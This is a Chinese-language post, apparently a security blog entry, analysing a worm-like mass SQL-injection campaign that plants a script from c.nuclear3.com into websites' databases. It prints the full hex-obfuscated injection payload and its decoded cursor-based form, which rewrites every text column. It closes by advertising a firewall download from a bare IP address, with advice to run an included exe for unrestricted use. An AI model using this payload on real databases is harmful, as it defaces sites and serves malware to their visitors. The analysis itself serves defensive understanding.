最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js></Script>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有498,000项,上万个网站被挂马。
木马地址不断变形<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>,但总是http://c.nuclear3.com/这段在不断变化,变种有
<Script Src=http://c.nu%63lear3.com/css/c.js></Script
<Script Src=http://c.nuclear3%2E%63om/css/c.js></Script
<Script Src=http://%63.nuclear3.com/css/c.js></Script
等等。
最终经过安全伞终于抓到木马原型如下:
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt
(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000
4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620
06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063
007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006
2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200
6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750
02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079
00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002
E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200
73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650
05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040
004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006
50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700
2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680
0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072
0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002
E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400
3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0
065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C
006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007
400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--
该木马通过Cookie注入挂马,使用搜索引擎自动查找并注入网站,有点蠕虫的性质。
上面cast里面sql语句解密如下
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And
A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script
Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>''')Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
安全伞2009企业版可以有效解决类似变相注入问题
官方下载:http://121.207.254.246/safe3.rar
小提示:该软件是收费的,但为了广大用户免受其害,可以下载后直接运行安全伞目录下的inu.exe,防火墙则被安装并且无限制使用。要使用其它功能最好还是购买下,希望大家支持本软件。